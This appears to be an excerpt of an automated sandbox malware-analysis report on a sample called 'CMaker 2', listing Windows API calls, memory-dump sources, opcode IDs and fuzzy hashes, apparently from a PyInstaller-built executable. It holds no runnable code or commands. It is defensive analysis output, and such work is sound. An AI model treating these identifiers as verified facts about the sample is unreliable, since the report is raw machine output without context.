• Instruction Fuzzy Hash: FE216061B1C64281FF24DB35E8913B92261AF6A394FC042B6E67EC65DAFE2CE504C700

Control-flow Graph

APIs
  • Part of subcall function 00007FF6FABE6D20: GetCurrentProcess.KERNEL32 ref: 00007FF6FABE6D40
  • Part of subcall function 00007FF6FABE6D20: OpenProcessToken.ADVAPI32 ref: 00007FF6FABE6D53
  • Part of subcall function 00007FF6FABE6D20: GetTokenInformation.KERNELBASE ref: 00007FF6FABE6D78
  • Part of subcall function 00007FF6FABE6D20: GetLastError.KERNEL32 ref: 00007FF6FABE6D82
  • Part of subcall function 00007FF6FABE6D20: GetTokenInformation.KERNELBASE ref: 00007FF6FABE6DC2
  • Part of subcall function 00007FF6FABE6D20: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6FABE6DDE
  • Part of subcall function 00007FF6FABE6D20: CloseHandle.KERNEL32 ref: 00007FF6FABE6DF6
• LocalFree.KERNEL32(00000000,00007FF6FABE2A89), ref: 00007FF6FABE751C
• LocalFree.KERNEL32 ref: 00007FF6FABE7525
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 60c4fd39fcac6d8e283f4d7189cc44c35b978d9b95943a5d7ecd7241549dd8e4
• Instruction ID: b992a89898bb565822ee14b12bf8dcc684925b86b11fbfce38b7434a957f9b2c
• Opcode Fuzzy Hash: 60c4fd39fcac6d8e283f4d7189cc44c35b978d9b95943a5d7ecd7241549dd8e4
• Instruction Fuzzy Hash: FD215C71A1864282FB10AB10E8553FA62A5EF89780F8494B5EA6EC37D6FF3CD944C740
APIs
• CreateDirectoryW.KERNELBASE(00000000,?,00007FF6FABE240C,?,?,00007FF6FABE2BD3), ref: 00007FF6FABE6812
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
• Opcode ID: 3bc923c488289a14523a6baf9d9f11372388867e082ec78953b2be25e99915c4
• Instruction ID: 1a3b312fc1ceecaeac6e5876e9b18934c519b93c8afc7e6687d8259a19f95204
• Opcode Fuzzy Hash: 3bc923c488289a14523a6baf9d9f11372388867e082ec78953b2be25e99915c4
• Instruction Fuzzy Hash: 6931C661B19AC145EB219B21E4A03AA6368EF45BE0F8442B1EE7D837C5FF2CD6458700
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABFCBCB), ref: 00007FF6FABFCCFC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABFCBCB), ref: 00007FF6FABFCD87
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: c31540d1621b960633301173278a43c162921b7fbac8ddbd441109263ef94ee1
• Instruction ID: 5abbc83ef5618b1f62f7c50210971ff04dcbf3ec099f590f37ed649e21fae4ce
• Opcode Fuzzy Hash: c31540d1621b960633301173278a43c162921b7fbac8ddbd441109263ef94ee1
• Instruction Fuzzy Hash: 7591D87AE0865185F750CFA5A4442BD2BA0BB47B88F98517DDE2E96AC4EF38E4D1C700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                  • Opcode ID: fdd97bbf6e68edbfd0100966c197f3e4f5c5660e1dd8c7e86fc9ba11ac3620d6
                                                                                                                                                                                  • Instruction ID: e9af51909ecaf57304369aa243da24b73cf1d51fcebe3604fb00abdc1c0d1e70
                                                                                                                                                                                  • Opcode Fuzzy Hash: fdd97bbf6e68edbfd0100966c197f3e4f5c5660e1dd8c7e86fc9ba11ac3620d6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 19510676F042518AEB14CFB499856BC27B5AB0535AF94427ADD3E92AE5FF3CA402C700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                  • Opcode ID: 6269b5f41561535a3e7af7ec4f39afc7b18a23eacddf722dddb7d9db96079186
                                                                                                                                                                                  • Instruction ID: b5eb429c5e4092b119cacf4cea2f5e13590e17d726c14311ddacbf50a876947a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6269b5f41561535a3e7af7ec4f39afc7b18a23eacddf722dddb7d9db96079186
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651AF26E186018AFB10CFB0D9503BD37B5AF49B48F588279DE29CB6C9EF38E4408740
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                  • Opcode ID: 3281e8f863b45228ded96b763e46d2b137e088969c29cf3df985d9b24e13a4ae
                                                                                                                                                                                  • Instruction ID: eac6bdee25a9925612cf5e5445845f9d139d0e8daf377f125f5d5eaf104486b5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3281e8f863b45228ded96b763e46d2b137e088969c29cf3df985d9b24e13a4ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: A541A176D1C78283E7108BA0D5103696660FB963A4F549379E6BC83AD6EF6CA5E08700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                  • Opcode ID: 4bce210e197046ffe348e7a14864d607a673f15493918c1003c5f58545c9a52e
                                                                                                                                                                                  • Instruction ID: bd91c1054d8b031c15a9c4be533d474f94fb08711b9c0003abdc50652361a1ac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bce210e197046ffe348e7a14864d607a673f15493918c1003c5f58545c9a52e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89D09E98B0870352FB546FB19C9917D12215F59741F54A4BCC83FC63E7FD2CA44D4600
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 16af8936fa4a8cfb084170ab3fdfe968383d28d333c1f7fec82ea00825d56c1b
                                                                                                                                                                                  • Instruction ID: 0d944b76c3a0a486452a833920b81a7f533ab57ada5ff39e63f3a89c797b0e31
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16af8936fa4a8cfb084170ab3fdfe968383d28d333c1f7fec82ea00825d56c1b
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA511671B1968256FB289E25944067A66D1BF42BA4F8887B4DE7DC37C6FF7CE4008700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1236291503-0
                                                                                                                                                                                  • Opcode ID: 6551513a98c324d7d7ba12c955d8146a8b4f51f5bb9c93bdc58fe40068057fbf
                                                                                                                                                                                  • Instruction ID: 94a78f0cf88e467c4d106e3aec20244f6077ffdb98d14b7522bbcface01ac7b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6551513a98c324d7d7ba12c955d8146a8b4f51f5bb9c93bdc58fe40068057fbf
                                                                                                                                                                                  • Instruction Fuzzy Hash: DF313D25E1820382FB14AB65E5913B91391AF47784FC490F9E93ECB2D7FE6CE8049741
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6FABFBD94,?,?,?,00000000,?,00007FF6FABFBE9D), ref: 00007FF6FABFBDF4
• GetLastError.KERNEL32(?,?,?,?,?,00007FF6FABFBD94,?,?,?,00000000,?,00007FF6FABFBE9D), ref: 00007FF6FABFBDFE
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABF5655), ref: 00007FF6FABF5773
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABF5655), ref: 00007FF6FABF5789
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
• API String ID: 1707611234-0
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
• GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF6FABFA55D,?,?,00000000,00007FF6FABFA612), ref: 00007FF6FABFA74E
• GetLastError.KERNEL32(?,?,?,00007FF6FABFA55D,?,?,00000000,00007FF6FABFA612), ref: 00007FF6FABFA758
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                  • Opcode ID: 8c844d6f8503df5aee10f6e9fa1b41c48229a7534358f50c5bfe35e86bfe2d9e
                                                                                                                                                                                  • Instruction ID: 04ab0b4fa61bd5dcff72f4a47117141f28c4c77c5aacc3cc9d37692d7580e5a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c844d6f8503df5aee10f6e9fa1b41c48229a7534358f50c5bfe35e86bfe2d9e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8221BF25B0829245FB149B6268943BA9651BF4ABC4FCC50F0EE2C8B7C6EE7CE841C200
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 03a38d327754cf904243aec50eb766fa9dc5ae6cf5c4f94ce4342806ccce901e
                                                                                                                                                                                  • Instruction ID: c9e9998d5ed24129563c22849d9ffcb48eea977f65cdc66d5a01b76ebced5f7d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 03a38d327754cf904243aec50eb766fa9dc5ae6cf5c4f94ce4342806ccce901e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60318126A286129AFB116F95CC4137C6A50AF42B94FC941B9D93D933D2EF7CE4418710
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                  • Opcode ID: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
                                                                                                                                                                                  • Instruction ID: 317aa114d44f643121f157184ce81799ab20b9a7db8569d78d376a244af95e21
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21923AE0474689EB249FA4C4402FC33A0FB49718F98467ADB2D87AC9EF38D544C780
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: f30853ad75514671e950d83128d7baef55a0632a96fda8d571026010811b12de
                                                                                                                                                                                  • Instruction ID: 028fac1dce5106bc847249e952b8ff20d19388232c66c18b125eeeb49f4bc5cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: f30853ad75514671e950d83128d7baef55a0632a96fda8d571026010811b12de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511C32DA2E64281EF209F91D40067DA668BF87B80FCC4179EB6C97AC6EF3CD4108700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 43c547841bdc5efa225ed36a7927e0e9c3599d8d1a01592de04ca1d2ac77ad37
                                                                                                                                                                                  • Instruction ID: 8bd48880803b86f2f387b8c157bbccada6e1ca8bf7faf4e197f78a48c96637f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c547841bdc5efa225ed36a7927e0e9c3599d8d1a01592de04ca1d2ac77ad37
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA218172A18A4287DB61CF58E44037976B0EB84B94F589274EAADC76DAFF7DD4008B00
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
